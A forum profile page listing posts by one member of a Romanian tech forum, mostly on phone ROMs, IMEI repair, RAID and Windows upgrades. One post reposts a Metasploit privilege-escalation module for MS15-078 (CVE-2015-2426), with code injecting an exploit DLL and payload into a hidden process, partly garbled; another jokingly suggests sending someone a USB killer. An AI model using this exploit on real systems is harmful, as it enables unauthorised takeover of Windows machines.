Jump to content

LLegoLLaS

Active Members
  • Posts

    2060
  • Joined

  • Last visited

  • Days Won

    11

Everything posted by LLegoLLaS

  1. despre ce device e vorba?
  2. LLegoLLaS

    RST Bashed

    To'ar??u c0bra1337 explica ce-s alea FPS.Pe indelete ca nu-i graba.
  3. programezi in Instagram++ ? citeste tematica forumului.Sau ti-ai facut contu? sa agati 'ec?ri, nebunule?
  4. LLegoLLaS

    Samsung

    reinstaleaza un ROM oficial petru inceput, cu ODIN de pe sammobile.com
  5. Nea Tr?ienel e long-shot, mai dureaza putin dar se duce si el Sa inteleg ca avem o noua sljmba, PEO , Postac Executive Officer.
  6. off: ''usi de garaj'' fute-m-as in ele de cuvinte, o singura data am cautat si ma spameaza cu reclame ) on: era un site gen seranking (i may be wrong)
  7. miner server de ce sa excluzi editarea video? ...cat mai multe simultan...Cu vreo 4-5 monitoare
  8. Pentru ce tara e giveaway?US/GER/ITA nu merg
  9. Din moment ce spune "sub alta forma" nu cred ca vinde db-ul.Ar fi penal
  10. LLegoLLaS

    RST Bashed

    @Psiho strikes again
  11. Ramane doar sa iti faci server acasa si sa-l tii in debara
  12. Scoate 220 cum scot si electrosocurile nu stiu cate sute dintr-o baterie de 12V. E clar ca nu functioenaza pe pcurile si laptopurile noi care au protectii.Cred ca a mai fost postat USBKiller pe aici ca am impresia ca ma repet . @hades intrebai pe chat cum sa faci nasoale cuiva.Trimite-i unu' de-asta //2000th post !!
  13. LLegoLLaS

    Buna !

    Salut, bine ai venit.Daca stii deja C++ decent e relativ usor sa te extinzi.Invata si alte limbaje de programare si ai sa-ti dai seama in timp ce vrei sa faci.Nu iti poate spune nimeni de unde sa incepi in domeniul asta
  14. quad sim respectiv trimple sim.Chiar daca nu cred ca e multiple standby
  15. Banuiesc ca e vorba de Galaxy S3 poti incepe de aici: [R&D] Fixing the generic IMEI problem | Samsung Galaxy Nexus | XDA Forums Ce ai facut gresit: Cand ai formatat ai bifat "Erase EFS" probabil. Vezi si: [REF] IMEI / EFS - Know this stuff (i9300) -… | Samsung Galaxy S III I9300, I9305 | XDA Forums //call baby
  16. avand in vedere ca ai limita la smsuri trimise la toti operatorii, s-ar putea sa vrei sa iei in calcul asta: LG A395 - Full phone specifications aici intrebare: operatorul citeste IMEI/ blocheaza si in functie de IMEI? sau android: Samsung Galaxy Star Trios S5283 - Full phone specifications
  17. This module requires Metasploit require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = ManualRanking WIN32K_VERSIONS = [ '6.3.9600.17393', '6.3.9600.17630', '6.3.9600.17694', '6.3.9600.17796', '6.3.9600.17837', '6.3.9600.17915' ] NT_VERSIONS = [ '6.3.9600.17415', '6.3.9600.17630', '6.3.9600.17668', '6.3.9600.17936' ] include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::FileInfo include Msf::Post::Windows::ReflectiveDLLInjection def initialize(info={}) super(update_info(info, { 'Name' => 'MS15-078 Microsoft Windows Font Driver Buffer Overflow', 'Description' => %q{ This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing a malformed font. The vulnerability was exploited by the hacking team and disclosed on the july data leak. This module has been tested successfully on vulnerable builds of Windows 8.1 x64. }, 'License' => MSF_LICENSE, 'Author' => [ 'Eugene Ching', # vulnerability discovery and exploit 'Mateusz Jurczyk', # vulnerability discovery 'Cedric Halbronn', # vulnerability and exploit analysis 'juan vazquez' # msf module ], 'Arch' => ARCH_X86_64, 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows 8.1 x64', { } ] ], 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'References' => [ ['CVE', '2015-2426'], ['CVE', '2015-2433'], ['MSB', 'MS15-078'], ['MSB', 'MS15-080'], ['URL', 'https://github.com/vlad902/hacking-team-windows-kernel-lpe'], ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/'], ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=369'], ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=480'] ], 'DisclosureDate' => 'Jul 11 2015', 'DefaultTarget' => 0 })) end def patch_win32k_offsets(dll) @win32k_offsets.nil? set_nt_offsets fail_with(Failure::NoTarget, 'ntoskrnl.exe offsets not available') if @nt_offsets.nil? begin print_status('Launching notepad to host the exploit...') notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true}) process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Meterpreter::RequestError # Sandboxes could not allow to create a new process # stdapi_sys_process_execute: Operation failed: Access is denied. print_status('Operation failed. Trying to elevate the current process...') process = client.sys.process.open end library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-2426', 'reflective_dll.x64.dll') library_path = ::File.expand_path(library_path) print_status("Reflectively injecting the exploit DLL into #{process.pid}...") dll = '' ::File.open(library_path, 'rb') { |f| dll = f.read } patch_win32k_offsets(dll) patch_nt_offsets(dll) exploit_mem, offset = inject_dll_data_into_process(process, dll) print_status("Exploit injected. Injecting payload into #{process.pid}...") payload_mem = inject_into_process(process, payload.encoded) # invoke the exploit, passing in the address of the payload that # we want invoked on successful exploitation. print_status('Payload injected. Executing exploit...') process.thread.create(exploit_mem + offset, payload_mem) print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end sursa: bugsearch.net
  18. Da, se pare ca e lipt, deci sunt amandoua in acelasi modul
  19. Daca e asta Display cu touchscreen BlackBerry Storm2 9550 versiunea 002/111 Original | GSMnet.ro Tu stii daca merita edit: nu am vreo legatura cu gsmnet, a nu se considera reclama
  20. tema o fi faina, da' ideea e originala ca masinile chinezesti
  21. Se poate mina de pe cam orice OS Mai ales distributii linux OS-ul e de fapt cam cea mai mica problema.hardware sa ai
  22. Presupun ca nu dispui de buget pentru SSD dar ai nevoie de capacitate mare, cel putin 1 TB. In situatia asta cea mai potrivita solutie e sa-ti iei 2,3,..n hdduri pe care le legi in RAID0.Cu cat mai multe cu atat viteza creste. Vezi Western Digital Black/Red. Daca vrei 1 TB iei 2x500 Daca vrei 1.5 TB iei 3x500 GB Daca vreo 2 TB iei 2x 1TB Daca vrei 3 TB iei 3x 1TB .De vazut si alte configuratii RAID pentru ca se schimba datele problemei daca rei backup etc.Dar probabil vrei home use ,caz in care 2 TB is suficienti
  23. Am facut si eu upgrade pe laptop.E deja al doilea. 8 >> 8.1 >> 10 .Instalarea a durat cam 25 de min cu tot cu download.So far so good, merge bine, ma distrez teribil cu Cortana Observ ca nu are nicio hiba cu driverele, si am foarte multe deviceuri nu foarte comune gen modem 3g , modem rj11, senzor de amprenta, touchstick (intre taste), light sensor.
  24. baga romul din nou rom-downloads - Support | HTC United States
×
×
  • Create New...